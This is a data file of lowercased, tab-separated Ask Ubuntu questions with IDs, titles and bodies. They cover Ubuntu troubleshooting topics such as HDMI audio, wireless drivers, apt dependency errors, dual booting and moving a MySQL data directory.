419723	is it possible to log programs executed from the drop down menu ?	i 'm trying to achieve similar functionality of bash history , but for programs executed from the drop down menu . for example , clicking and executing `` applications - > calculator '' would leave an entry in a log file noting that the user executed this program . is there a built-in solution to this , or maybe a simple third-party utility that can handle this ? here is a link to an example of the menu i am talking about , in this case in xubuntu , i believe it is the gnome menu ?
419726	hdmi audio fails speaker-test	edit : this is not a duplicate of no sound on hdmi with radeon driver . i have followed those instructions to update grub , and the problem persists . i 'm having no luck getting hdmi audio to work . i 've searched around and read many many suggestions on how to fix this issue , but none have solved the problem . running ubuntu 13.10 amd radeon richland integrated apu onboard audio works fine hdmi audio does n't make a peep details : $ lspci -nn | grep vga 00:01.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] richland [ 1002:999c ] $ aplay -l **** list of playback hardware devices **** card 0 : hdmi [ hda ati hdmi ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 0/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 0 : alc892 analog [ alc892 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : generic [ hd-audio generic ] , device 1 : alc892 digital [ alc892 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0` $ cat /proc/asound/version advanced linux sound architecture driver version k3.11.0-15-generic $ sudo lshw -c video *-display description : vga compatible controller product : richland vendor : advanced micro devices , inc. [ amd/ati ] physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=fglrx_pci latency=0 resources : irq:53 memory : c0000000-cfffffff ioport : f000 ( size=256 ) memory : ff700000-ff73ffff things i 've already tried : ensure hdmi is unmuted in alsamixer update alsa to latest daily build . running oem-audio-hda-daily-dkms - 0.201402110705~ubuntu13.10.1 update video driver from radeon to fglrx ( catalyst 13.12 ) . initially hdmi audio was not listed among outputs under sound settings ( although it was shown in aplay -l ) , but after installing fglrx driver , now hdmi audio is listed in sound settings . checked volume and settings in pulseaudio volume control - set hdmi audio to be the fallback output . i 'm at a loss what to try next . maybe the most telling error related to this is the one from speaker-test : $ speaker-test -c2 -d hw:0,3 -r48000 speaker-test 1.0.27.1 playback device is hw:0,3 stream parameters are 48000hz , s16_le , 2 channels using 16 octaves of pink noise rate set to 48000hz ( requested 48000hz ) buffer size range from 64 to 16384 period size range from 32 to 8192 using max buffer size 16384 periods = 4 was set period_size = 4096 was set buffer_size = 16384 0 - front left write error : -5 , input/output error xrun_recovery failed : -5 , input/output error transfer failed : input/output error any help is greatly appreciated ! thanks
419729	how can i zoom one specific window in kde ?	in my high resolution laptop display i defined the font to 230 dpi so everything looks fine but some apps that are running in java . is it possible to display a specific desired window scaled in double size ? for example : define that only the jitsi-window has double size while all other windows stay system size .
419732	how do i install a .zip file via the command line ?	how do i install a .zip file via the command line ?
419733	problem with sudo apt-get after tryng to install wine	i try downloading wine , use : sudo apt-get install wine . terminal stop working and i try restart terminal many times but result was same so i stopped . then i try using sudo apt-get command and this is what kept showing up : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? i did not have any program running and dont know what else to do .
419735	nvidia hybrid graphics ( intel/nvidia ) will not properly work	i recently got an msi laptop . i can say that i am very pleased with the performance . windows 8 was installed by default so i went ahead and installed linux on here . once again i am pleased with the performance -- like usual , its ubuntu -- except for this one large hiccup . i can not get the nvidia graphics card to run under ubuntu , or any other distro for that matter . i have a nvidia geforce gtx 770m with 3gb of dedicated ram ; the card also had an interrogated intel driver . it is using the gallium 0.4 on llvmpipe ( llvm 3.3 , 256 bits ) driver and i would t the least prefer the intel driver , although i want to use the nvidia driver because i like to game , thatâs why i even got this laptop . i have tried many different things , i have tried the nvidia provided drivers but all that does is render the system useless and i have to reinstall , i have tried sudo apt-get install -- reinstall xserver-xorg-video-intel and i have tried the nvidia 319 drivers , once again rendering my system useless . any help would be much appreciated , thanks !
419738	black screen after install graphic card drivers	league of legends was lagging and i 'm new to ubuntu , so i decided to look at my graphics card ( intel ) , so i downloaded additional drivers and activated the card that came up . it asked me to reboot so i did . i have to enter my pass key to /dev/disk/by-judi/35fe223f-3145-45ac-bcc5-afe65c6c0299 ( sda5_crypt ) then it scans and the scans are good . but after i type in my password to log in , i get a black screen with my mouse cursor .
419740	samba configuration file .	i am trying to pre setup for a samba file share server but i need a smb.conf file so that i can do some of the preprogramming . can someone get me a copy .
419746	problem after moving over mysql	i was moving my mysql datadir since my / partition was nearly at full capacity . i did the following : service mysql stop cp -r /var/lib/mysql /home/mysql chown -r mysql : mysql /home/mysql service mysql start i also edited the my.cnf file before i restarted mysql , i also edited the apparmor alias . the mysql server seems to startup , however if i try to go to phpmyadmin , it wo n't log me in . i checked my logs , this is what i found : http : //paste.ubuntu.com/6917893/ running ubuntu server 12.04.04 x86
419747	my wireless icon disappeared	dell inspiron 15 '' laptop i installed ubuntu 12.04.2 ( because that fit on a cd , part of me hates using up a whole dvd over a couple of mb ! ) everything worked . i used the software update button , it installed a bunch of stuff , and everything worked . i was trying to get my cac working and installed the drivers for the iogear gsr202 smart card reader and cackey . that was n't working , and a couple of people thought coolkey worked better so i went to install that . at some point , i did an apt-get update / apt-get upgrade . after rebooting , my wi-fi network is gone , and the icon is gone from the bar at the top . i 've googled . lots of suggestions talk abouy uninstalling / reinstalling stuff . others wind up referring to network-manager-gnome things . that is n't installed , and so is n't how this worked in the first place . i ca n't find any other control panels that have anything to do with networking . 'ifconfig wlan0 up ' does n't result in anything . when i open system settings , network , there 's a message that says `` the system network services are not compatible with this version '' . huh ? a few references to that being an issue from over a year ago . so ... how do i go about getting my wireless working again ?
419750	how to extract the text between single quotes ?	i 'm running wallch to automatically cycle thru my wallpapers . i have hundreds of them . i created a little application that displays the title of a wallpaper : export display=:0 & & /usr/bin/zenity -- info -- text= '' $ ( gsettings get org.gnome.desktop.background picture-uri | cut -c 41- ) '' without the cut , the output is : 'file : ///home/frank/pictures/wallpapers/sitka_harbor.jpg' with the cut , i get the file name : sitka_harbor.jpg' i want to get rid of the trailing apostrophe . i 've tried various combinations of the cut -- output-delimiter , but ca n't seem to get it to work . i would be grateful if someone could point me to some code that would return just the file name . thanking all , sadhu
419753	unable to connect to wifi using dlink dwl-122 usb adapter	i 'm completely new to linux . i just installed ubuntu studio 13.10 and everything seems to work fine except the wireless adapter . i have a dlink dwl-122 and i can see the network ... i applied the correct password and the icon shows it is trying to connect but nothing happens . any idea about how to solve this issue ? thanks in advance .
419756	network is connected-firefox wo n't connect to net	i 'm really sorry for the dumb question-i just got a laptop with a clean install of ubuntu 13.04 . it says i am connected to my network , but when i try to go online firefox says : server not found . firefox ca n't find the server at start.ubuntu.com . can someone help me with this problem ? thank you .
419757	can not install wine1.6 or playonlinux	i have went through every question related to this and none of them worked for me . for wine i keep getting the following packages have unmet dependencies : wine1.6 : depends : wine1.6-amd64 ( = 1:1.6.1-0ubuntu1~ppa1~precise1 ) depends : wine1.6-i386 ( = 1:1.6.1-0ubuntu1~ppa1~precise1 ) recommends : fonts-droid but it is not installable recommends : ttf-mscorefonts-installer but it is not installable recommends : fonts-horai-umefont but it is not installable recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . and for playonlinux i keep getting the following packages have unmet dependencies : playonlinux : depends : python-wxgtk2.8 but it is not going to be installed depends : cabextract but it is not going to be installed depends : p7zip-full but it is not going to be installed please help thank you in advanced if this gets fixed .
419759	problem in installation in opencv in ubuntu 12.04	note : - may be you thinks that this is duplicate one . but i ( quiet newbie to ubuntu ) gone through with many forum even i gone through with askubuntu with same question and tried lots of things but still i dont get rid from this problem . so when i am trying to install the opencv on the ubuntu with this command . sudo apt-get install build-essential checkinstall git cmake libfaac-dev libjack-jackd2-dev libmp3lame-dev libopencore-amrnb-dev libopencore-amrwb-dev libsdl1.2-dev libtheora-dev libva-dev libvdpau-dev libvorbis-dev libx11-dev libxfixes-dev libxvidcore-dev texi2html yasm zlib1g-dev it shows the errror like , reading package lists ... done building dependency tree reading state information ... done git is already the newest version . libtheora-dev is already the newest version . libva-dev is already the newest version . libvorbis-dev is already the newest version . texi2html is already the newest version . yasm is already the newest version . zlib1g-dev is already the newest version . checkinstall is already the newest version . libmp3lame-dev is already the newest version . libopencore-amrnb-dev is already the newest version . libopencore-amrwb-dev is already the newest version . libxvidcore-dev is already the newest version . libfaac-dev is already the newest version . build-essential is already the newest version . cmake is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libjack-jackd2-dev : depends : libdbus-1-dev but it is not going to be installed libsdl1.2-dev : depends : libglu1-mesa-dev but it is not going to be installed depends : libpulse-dev but it is not going to be installed depends : libxt-dev but it is not going to be installed depends : libxext-dev but it is not going to be installed libx11-dev : depends : libx11-6 ( = 2:1.4.99.1-0ubuntu2 ) but 2:1.4.99.1-0ubuntu2.1 is to be installed depends : libxcb1-dev but it is not going to be installed recommends : libx11-doc but it is not going to be installed libxfixes-dev : depends : libxfixes3 ( = 1:5.0-4ubuntu4 ) but 1:5.0-4ubuntu4.1 is to be installed e : unable to correct problems , you have held broken packages . now , lots of dependencies is there , any solution if i tries to install libdbus-1-dev , again it is depends on somethings by the way is this problem of broken package or the unmet dependencies ? please anyone , thanks in advance .
419761	suspend / hibernate have not worked on acer aspire one d257 with 10.04 since kernel 2.6.32-48	all kernels newer than 2.6.32-48 cause a hang when trying to resume from a suspend or hibernate on my netbook . edit : just discovered support ended ... if anyone knows a minor adjustment to make , great ; otherwise i 'll just try the latest lts version
419763	migrate from opensuse to ubuntu	i have been tasked by my job to upgrade their opensuse environment to ubuntu . i am a novice level linux user ( ive only really played/studied with ubuntu ) and i honestly dont even know where to start . ive done some google searches and read the migration document on one of the ubuntu sites but it does not give much information on how to do this . i was hoping someone can give me a sort of play by play on how to do this or at least point me in the right direction . is it as simple as copying over all the files to their respective folders ?
419764	how to get my wireless working on my gigabyte wi-fi board	i have an a88x gigabyte fm2+ motherboard with a bluetooth wi-fi card installed . i 'm really new to ubuntu and would like to know how i can use the wireless that came attached to the board . for reference : http : //www.gigabyte.us/products/product-page.aspx ? pid=4745 # ov
419765	minecraft crashes constantly [ sigsegv ] i965_dri.so libjvm.so	my problem is that minecraft is constantly crashing , giving 1 of 2 different errors in the log . i 've tried using the edgers ppa . i 've tried minecraft with no mods or with optifine . i 've searched for my errors online trying to find a solution to no avail . i 'm running on ubuntu 14.04 beta , java 8 , 64-bit lspci | grep vga & & glxinfo | grep -w 'direct\|opengl ' output 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) direct rendering : yes opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl core profile version string : 3.1 ( core profile ) mesa 10.2.0-devel opengl core profile shading language version string : 1.40 opengl core profile context flags : ( none ) opengl core profile extensions : opengl version string : 3.0 mesa 10.2.0-devel opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : here are 2 links to the relevant crashes https : //dl.dropboxusercontent.com/u/53496734/hs_err_pid16990.log https : //dl.dropboxusercontent.com/u/53496734/hs_err_pid21930.log problematic frame being : v [ libjvm.so+0x1f1a45 ] _init+0xc8d or c [ i965_dri.so+0x31b8ae ] __dridrivergetextensions_i965+0x6b69e
419768	how to install drivers for eoxys mini usb 150n wifi adapter ?	i have this mini usb wifi adapter `` leoxys mini usb 150n wifi adapter '' . it uses ralink 7601 chipset . the drivers are working fine under windows . i 'm unable to install the drivers provided in the cd for linux . so i tried using ndiswrapper and installed the driver from the netr28ux.inf file . here 's the output of my lsusb : bus 002 device 004 : id 0a5c:219c broadcom corp . bus 002 device 003 : id 148f:7601 ralink technology , corp . bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 2232:1020 bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the device is ralink technology . but it is not showing up under ifconfig as a network interface . how do i fix it ?
419770	ubuntu based distros wont install	not really sure if i should be asking this here and i know i certainly do n't have enough information for the community 's help but i am going to let it fly . i have a lenovo v570 laptop , plenty of performance for linux but i can not get ubuntu to install . i have an existing install of windows 7 pro from the oem disc . my goal is to install linux on the d drive and the oem partition . i tried to modify those partitions using the installer repartition tool and that seemed to work but still failed to install . here is the makeup of my drive . . i wold like to have the option to dual boot the computer in either the linux or windows environment . my preferred distribution is ubuntu and i tried to install the 12.04.3 version but received the following installation failed message box during the installation : the installer encountered an error copying files to the hard disk : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . here is the link to the instructions i used from the ubuntu site to find the usb iso creator . i downloaded and used the pendrive linux installer to create the liveusb flash drive . the software will boot into a livecd as well as a liveusb flash drive . i then tried 12.04.4 and then linux mint 16 and get the same response . even occurs when i tried installing it in a virtualbox . edit : i was able to install 13.10 on the virtual box . i was however able in install zorin os 6 lts which makes me wonder what am i doing differently with zorin 6 that i 'm not doing with ubuntu . i hate to ask this question but i am so new to linux ( 5 days ) i have no clue what to do . any ideas why i seeing this issue ?
419777	well-made vagrant box for ubuntu 13.10	i am currently using a vagrant box provided among cloud images for ubuntu 13.10 32 bit , but it has a number of issues i would like to avoid , relative for instance to the `` official '' vagrant image for 12.04 from vagrant : it has a single root partition covering the entire disk , and no swap , instead of using lvm and having swap preconfigured . that 's not fixable by simple provisioning , as far as i can tell , since one would need to reboot to some separate linux distribution , repartition , and reboot again . ( i do n't think i can loop-mount vm image from the host , since they are n't raws - but more importantly , that would defeat the point of vms , and for instance not work on my os x host ) . no cdrom drive is preconfigured , so installing the guest additions from virtualbox does not work directly ( the drive can be added vboxmanage , but if i make vm do that in the customization section , it gets re-executed at each boot , which does not work ) . linux-generic is not installed - this gave some funny errors when compiling external modules ( from virtualbox guest additions ) : they would compile but not load , because they depend on modules which are part of linux-image-extra-3.11.0-15-generic . only once you find this problem , fixing it is rather easy . how can i fix this ? my favorite solution would be a high-quality vagrant box for ubuntu 13.10 ( preferably 32bit ) , but better ways to fix the above problems are also accepted .
419778	read/write permission issues on ubuntu 12.04 ( fresh install )	i 'm a new ubuntu user . after the installation i can not copy or paste in any drive outside my home folder . what i have to do to get permission ?
419779	convert windows text file to ubuntu text file	i am trying to port a c++ program from windows to ubuntu . in ubuntu environment , my program reads a text file which was created in windows , however it appears the carriage return is affecting the reading of the file in ubuntu environment , therefore i wish to remove all the carriage return . i have tried the following command on windows to convert the text file to linux format dos2unix user.txt user1.txt i also tried this tr -d '\15\32 ' < user.txt > user1.txt both these methods dont work , i am getting the following error : is not recognised as an internal or external command , op program , or batch file what am i doing wrong here ? ?
419782	can i run ubuntu on my ipod ?	i 've seen ads around for an ubuntu smartphone but is it possible to reconfigure the operating system on my ipod 5 running ios 7 to run an ubuntu smartphone operating system ? even further , is it possible to some how make it dual boot the same way you can with a computer ? the menu asks you which os to boot into ? i realize it 's not a supported device for the smart phone operating system , but is there an under the table method to change the os on it ?
419783	gtk-warning ** : calling inhibit failed : gdbus.error : org	when i try to gedit some files , then i received these from the terminal window . there is already one post about this : gtk-warning : calling inhibit failed but it is not solved . how can i solve it ?
419786	ubuntu emulator installation from ubuntu sdk in ubuntu 12.04	i am trying to install ubuntu emulator in ubuntu 12.04 these are things i have done to install started ubuntu sdk clicked devices selected emulators clicked install but i am not able to install it properly . i checked the log i got the following errors checking installed emulator package . the package is not installed . detecting device.. * there is no device connected . install the emulator package on the system.. reading package lists ... building dependency tree ... reading state information ... e : unable to locate package android-emulator but i have installed eclipse and the android emulator runs properly there without fail .
419787	ubuntu 13.10 wireless issue	i have recently installed ubuntu 13.10 on my dell laptop inspiron e1505 . it seems to work okay except i have yet to be able to connect to the wifi in my home . i have googled several answers on here but none have seem to work for me . i can not seem to find the `` system settings - > additional drivers '' i am a n00b but following all the advice from posts . i have gotten this from the terminal . john @ john-mm061 : ~ $ iwconfig lo no wireless extensions . john @ john-mm061 : ~ $ iwconfig lo no wireless extensions . john @ john-mm061 : ~ $ sudo rfkill unblock all [ sudo ] password for john : john @ john-mm061 : ~ $ iwconfig lo no wireless extensions . john @ john-mm061 : ~ $ sudo modprobe rtl8192cu john @ john-mm061 : ~ $ sudo iwlist wlan0 scan wlan0 interface does n't support scanning . john @ john-mm061 : ~ $ rfkill list all john @ john-mm061 : ~ $ dmseg | grep iwl no command 'dmseg ' found , did you mean : command 'dmesg ' from package 'util-linux ' ( main ) command 'mmseg ' from package 'sunpinyin-utils ' ( main ) dmseg : command not found john @ john-mm061 : ~ $ dmesg | grep iwl john @ john-mm061 : ~ $ john @ john-mm061 : ~ $ john @ john-mm061 : ~ $ john @ john-mm061 : ~ $ lspci -nnk | grep -i net -a2 03:00.0 ethernet controller [ 0200 ] : broadcom corporation bcm4401-b0 100base-tx [ 14e4:170c ] ( rev 02 ) subsystem : dell inspiron 6400 [ 1028:01af ] 03:01.0 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 ieee 1394 controller [ 1180:0832 ] -- 0b:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : dell wireless 1390 wlan mini-card [ 1028:0007 ] kernel driver in use : wl john @ john-mm061 : ~ $ rfkill list all john @ john-mm061 : ~ $ rfkill unblock lan bogus unblock argument 'lan ' . john @ john-mm061 : ~ $ rfkill unblock wlan john @ john-mm061 : ~ $ sudo apt- get remove bcmwl-kernel-source sudo : apt- : command not found john @ john-mm061 : ~ $ sudo spt-get remove bcmwl-kernel-source sudo : spt-get : command not found john @ john-mm061 : ~ $ lspci -k -vv | grep -a11-i wlan grep : 11-i : invalid context length argument john @ john-mm061 : ~ $ lspci -k -vv | grep -a11 -1 wlan john @ john-mm061 : ~ $ rfkill list all john @ john-mm061 : ~ $ rfkill list all john @ john-mm061 : ~ $ if i have to connect via ethernet cable , i know to plug it in but when i did that ... still nada . : ) thanks in advance !
419788	upgrade ubuntu without losing setup	i currently have ubuntu 13.10 released but with 14.04 somewhat near , i 'm having questions about the upgrade process . when i installed 13.10 , i had a boatload of major problems ( audio drivers , display drivers , boot issues , etc . ) and a few minor annoyances . i managed ( with much struggle ) to fix most if not all of these issues . my question is that when i upgrade to 14.04 , will i lose all this or should all my changes stay ? i 'm new to linux so i have no idea what an upgrade encapsulates . thanks for your time !
419792	my huawei e173 dongle works in ubuntu 12.04 not in 13.10	as the topic mentions , i have this problem . i use the normal `` connect '' option on the right hand top and i am able to successfully connect to the network using 12.04 but not using 13.10 . may i know why and if there is a solution ?
419793	no internet connectivity in command line ubuntu	i am beginner and i have installed command line ubuntu 12.04 and upgraded it to 12.4.3.then i installed kvm as i want to install 2 vm 's and connect them to physical network.the problem is when i started creating vm using command line mode , it gave me a error saying that could not archive files from ubuntu.com.i pinged into some other well known sites like google and yahoo but it says unknown host.so i suppose i messed up with my network settings after installing kvm . please help to sort it and advise for any further steps i will need while doing it .
419797	i have two intenal ssds . windows 7 is on one , how do i intall ubuntu on the other ssd ?	this is probably super simple , but i 've spent about 7 hours over the last 2 days trying to get this accomplished . most of the time is just waiting while things install or boot . i first tried putting the iso on a 64gb usb with the pendrive usb installer and then installing from that . after many attempts where my computer would just freeze on a black screen or freeze during the language selection i found that many large usb 2.0 pen drives will not work . so i tried my smaller pen drive and actually got to the part where i pick the install location . it was confusing though because it had two different things , sorry but i can not remember the names and it takes about 30 minutes to get to the screen . the top part showed all of the partions of all of my different drives , there are two interal ssds and three external drives , but it listed them with a naming scheme that made it basically impossible to tell them apart . i think i found the right one though by the size of the partition and used space . the bottom had a selection box where it asked what drive to do something , which is what i do n't understand . i thought i was just selecting the place to install . so i selected the same partition in both and tried to install but the button was grayed . so i tried to select the button where it says `` create '' something , thinking that i did n't have the partition set up properly but the create button is unresponsive . sorry for my crappy explanation , i ca n't remember the exact wording of the button/prompts . is there someway i can install ubuntu on the second ssd from the windows environment ? thanks !
419798	network manager dispatcher.d script error	i wrote a script in `` /etc/networkmanager/dispatcher.d '' to open the firefox preferences dialog whenever i connect to a particular network ( college wifi ) , because i have to enable proxy . the script is returning with `` error code 1 '' in the logger . if i comment out the `` firefox -- preferences '' line , the script runs and the `` firefox script executed '' text is displayed in the logger . how do i rectify it ? here 's the script : # ! /bin/sh -e if [ -z `` $ 1 '' ] ; then echo `` $ 0 : called with no interface '' 1 > & 2 exit 1 ; fi case `` $ 2 '' in up|vpn-up ) if [ `` $ connection_uuid '' = `` 6e7f613f-5563-48f7-892d-655e95c0b834 '' ] ; then firefox -preferences logger -s `` firefox script executed '' fi ; ; down|vpn-down ) ; ; hostname ) # do nothing exit 0 ; ; hostname|dhcp4-change|dhcp6-change ) # do nothing ; ; * ) echo `` $ 0 : called with unknown action \` $ 2 ' '' 1 > & 2 exit 1 ; ; esac
419799	dualboot ubuntu 12.04 windows 8.1	i have installed ubuntu 12.04 earlier . i tried to install another windows 8.1 os hdd into my computer . the system made a boot menu automatically with win 8.1 entry , but it does not work . i get error messages : error : unkonown command 'drivemap ' error : invalid efi file path boot-repair tells that i must create a new partition for boot , but there is no possibility to do it . boot-repair gave a log : http : //paste.ubuntu.com/6918492/
419802	how to install windows from ubuntu 12.04 with no partition dedicated to windows ?	essentially when i originally installed ubuntu , i got rid of my windows and had the hard drive reformatted . i never split up the hard drive to dual boot . now that the hard drive is formatted for linux ... how to i get some space available to be able to dual boot ? it wo n't let me partition when i 'm using the hard drive that is associated with the operating system . please help .
419803	undefined reference to `__asprintf_chk in stdio2.h while compiling qemu	i am trying to compile qemu1.0.1 on linux-octeon . after configuration i get following error anyone there to guide me . error is following link qemu-ga qemu-ga.o : in function asprintf ' : /usr/include/bits/stdio2.h:158 : undefined reference to__asprintf_chk' qemu-timer-common.o : in function init_get_clock ' : /home/kics/hafiz.shafiq/work_qemu/qemu-1.0.1/qemu-timer-common.c:57 : undefined reference toclock_gettime' qga/guest-agent-commands.o : in function qmp_guest_file_write ' : /home/kics/hafiz.shafiq/work_qemu/qemu-1.0.1/qga/guest-agent-commands.c:249 : undefined reference tog_base64_decode' qga/guest-agent-commands.o : in function qmp_guest_file_read ' : /home/kics/hafiz.shafiq/work_qemu/qemu-1.0.1/qga/guest-agent-commands.c:224 : undefined reference tog_base64_encode' collect2 : ld returned 1 exit status
419805	configuration changes resist to apply , and some other mess ; need help !	ca n't say exactly what might have done this , ( i was trying xephyr and removed some old kernels in my last good session.. ) but now i can see that some mess has been made . the themes do n't apply properly , here 's a snapshot . the dark colours of the panel and the menu bar are not meant to be for my radiance theme . the icon themes too resist to change ; i tried to login with gnome2 environment and all i get is a super zoomed window , the mouse cursor almost than the size of my palm ! ( but gnome2 is working fine for another user in the system ) ; how can i fix these ? update 01 : here 's a snap showing gnome-tweak-tool and dconf-editor window theme is already set to radiance but still ... something seems to be wrong with shell theme.. is it ? ( ..also i noted adwaita being default , should n't that be ambiance ? is n't ambience the default for ubuntu 12.04 ? ) update 02 : despite changing icon theme to moka and window theme to radiance the changes do n't apply . firefox should n't appear the way it is now with radiance..
419806	how do i remove teamviewers notification that it is still running in the background ?	there seems to be a bug with the current teamviewer implementation on linux where it shows a windows-looking `` balloon '' type notification informing the user that teamviewer is still running in the background . to disable this notification , the user is encouraged to click the notification , but this does not work . as clicking the notification does not work , how do you make teamviewer no longer display the message , seemingly triggered by full screen applications ?
419808	media player that can be told what tracks i want to skip	some tracks in my music library only consist of introductory talk and things like that i usually want to skip . is there a media player that can be taught to not play certain tracks , either using id3 tags or a blacklist ? i looked at rhythmbox , banshee and quod libet but so far did n't discover a built-in feature or extension like that .
419809	how to install eclipse standard 4.3.1 on kubuntu ?	i installed it from the software center , but it did not work stable .
419811	repeater/access point with 2 wifi interfaces very low bandwidth	if somebody knows an answer to access point question ! i set up an ap with hostapd . works fine if ap is on wireless interface wlan0 and connection to the internet is wired eth0 . i get up/down speeds around 34mbps . however if instead of wired eth0 i use second wireless wlan1 as a connection to the internet , i get very low bandwidth around 2-4mbps . note that i tested wlan1 connection bandwidth to the remote server with iperf and got up/down around 90mbps . both wifi interfaces use different channels and both wifi devices use original manufacturers drivers . i 've tested it on ubuntu server 13.04 and debian 7 with h/w zbox and also raspberry pi . for wifi interfaces i used alfa awus036nhr question : why when setting up ap wlan0 with eth0 ( wireless < - > wired ) outperforms by so much wlan0 with wlan1 ( wireless < - > wireless ) ? is it something to do with wifi drivers or bridging both interfaces , or any other reason i missed out ? here are my settings : /etc/network/interfaces auto lo wlan0 wlan1 iface lo inet loopback # access point iface wlan0 inet static address 192.168.52.1 netmask 255.255.255.0 # connection to the internet iface wlan1 inet dhcp wpa-supplicant /wpa_supplicant/wpa_supplicant.conf up iptables-restore < /etc/iptables.ipv4.nat /etc/hostapd/hostapd.conf interface=wlan0 driver=nl80211 ssid=ap-1 hw_mode=g ieee80211n=1 wmm_enabled=1 wme_enabled=1 ht_capab= [ ht40- ] [ ht40+ ] channel=6 # wpa2 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=xxxx wpa_key_mgmt=wpa-psk wpa_pairwise=tkip rsn_pairwise=ccmp /etc/dnsmasq.conf interface=wlan0 dhcp-range=192.168.52.5,192.168.52.254,255.255.255.0,12h iptables & ipforward iptables -t nat -a postrouting -j masquerade echo 1 > /proc/sys/net/ipv4/ip_forward
419812	java for ubuntu12.04 lts	i want to install java from java.com - in the site i see multiple options for linux - which one to choose for ubuntu 12.04 lts ? why this is not available in ubuntu software centre ?
419817	reporting specific ubuntu software center issues ?	to whom or where do i report issues with the ubuntu software center ? i am trying to download openshot and it tells me that i have no internet connection ... despite the fact that i do have a working internet connection and i was able to install an unrelated program using the ubuntu software center . clearly there is something wrong with this specific program ...
419818	connecting to internet using beaglebone using usb dongle	i have a huwawei e173 dongle which i like to use on the beaglebone black running ubuntu 13.04 to obtain wireless internet connectivity . i am a newbie . i would appreciate so much if someone can provide me a guidance how i should do this .
419822	lcp terminated by peer	i am using ubuntu 13.10 and i need to log through pppoe . however , it does not works . it returns feb 12 16:14:39 u pppd [ 7382 ] : remote message : login ok feb 12 16:14:39 u pppd [ 7382 ] : pap authentication succeeded feb 12 16:14:39 u pppd [ 7382 ] : peer from calling number 24 : af:4a:9c : d6:06 authorized feb 12 16:14:39 u pppd [ 7382 ] : lcp terminated by peer feb 12 16:14:40 u pppd [ 4341 ] : connection terminated . feb 12 16:14:40 u pppd [ 4341 ] : modem hangup feb 12 16:14:42 u pppd [ 7382 ] : connection terminated . feb 12 16:14:42 u pppd [ 7382 ] : modem hangup what 's the problem ? what should i do ?
419823	list video filename and duration for multiple files in folder and subfolders with path too if possible	i need to get a list of filenames and path along with the duration of the file . all are video files . some files are in subfolders as well . i need the list sorted according to duration . my goal is to delete the files which have a duration lower than 2 minutes . is there someway i can do it through terminal or gui ?
419826	ubuntu rightclick command line custom backup	os : ubuntu 12.04 lts , kernel : 3.8.0-35-generic kernel , when i right click on `` text file/s '' , i would like to have a custom menu , to run a bash , to make a backup copy of text file/s i 'm right clicking on . suppose i right click on the following three files : /home/user_name/folder/file_1 /home/user_name/folder/file_2.c /home/user_name/folder/file_3.sh suppose time stamp is 2013/12/31 23:59:59 i would like to have the following : /home/user_name/folder/20131231_235959/file_1.bak /home/user_name/folder/20131231_235959/file_2.c.bak /home/user_name/folder/20131231_235959/file_3.sh.bak how do i make this little toy ? any help ?
419829	i want to install my sql client and server	i need to form network like `` directory service '' i am using ubuntu 13.10 client and 13.10 server i need to install `` my sql server and client '' thanks and regards in advance
419832	new keyboard layout for albanian ?	i would like to have at least one alternative keyboard layout for the albanian language provided as a distro update or as part of future releases of ubuntu . could anyone let me know where or how i could submit a proposal to the developers ? the `` official '' albanian layout is somewhat inadequate and highly unpopular among albanian users . for that reason , i have created and published two alternative layouts that take into account the market in albanian-speaking countries ( dominated by us mechanical keyboards ) and user preferences ( for a layout similar to the us model ) . you may find more information about the layout on wikipedia ( https : //en.wikipedia.org/wiki/albanian_keyboard_layout # plisi ) or on my albanian-language website ( http : //www.plisi.al/softwer/tastiera-plisi-d ) where you may also download the installation files .
419835	apt-get update not working + ubuntu 32-bit vs 64-bit	i am a newbie to linux platform.please do n't mark this question as duplicate before reading it completely. ! my system is running on intel i5 processor and the os i recently installed is 64-bit ubuntu 13.10 . i had to install a set of libraries for my android developer tool ( adt ) to function correctly . all started with the linuxizing of my system and development environment ! this is one of the links i sued for this purpose . sudo dpkg -- add-architecture i386 sudo apt-get update sudo apt-get install ia32-libs i also used the tips to speed up ubuntu 13.10 but when ever i do a sudo apt-get update , it is showing the following warning messages repeatedly many times . w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 13.10 _saucy salamander_ - release amd64 ( 20131016.1 ) /dists/saucy/restricted/binary-i386/packages 